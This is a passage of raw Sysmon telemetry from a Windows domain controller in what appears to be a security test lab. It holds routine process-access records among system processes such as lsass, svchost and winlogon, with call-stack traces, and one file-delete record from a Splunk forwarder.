ERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055312Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.780{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8D28-6151-8900-00000000FD01}3220C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055311Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.780{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D28-6151-8900-00000000FD01}3220C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+366e9|c:\windows\system32\rpcss.dll+3bed2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055310Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.748{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1ec9a|C:\Windows\SYSTEM32\samsrv.dll+5e81|C:\Windows\SYSTEM32\samsrv.dll+5d82|C:\Windows\SYSTEM32\samsrv.dll+1594e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055309Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.686{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001055308Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.686{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001055307Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.686{5EBD8912-8CC0-6151-1600-00000000FD01}12961784C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055306Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.686{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+2de4|c:\windows\system32\lsm.dll+57af|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055305Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.686{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2dce|c:\windows\system32\lsm.dll+57af|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055304Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.686{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+5f9d|c:\windows\system32\lsm.dll+57a4|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055303Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.670{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001055302Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.670{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001055301Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.670{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001055300Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.670{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+2f9b|c:\windows\system32\lsm.dll+5727|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055299Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.670{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2f4d|c:\windows\system32\lsm.dll+5727|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055298Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.670{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+5f9d|c:\windows\system32\lsm.dll+5718|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055297Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.670{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+56c4|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055296Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.639{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52A93FEA854CEA9273C2B9E838A8EC6F,SHA256=E47D936CB7BDE8826E783B1AE1FD10AF89037A62B6CA6CD1A5C07DD0D0C2F677,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055295Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.577{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055294Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.577{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055293Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.577{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055292Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.577{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055291Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.545{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055290Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.545{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055289Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.545{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055288Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 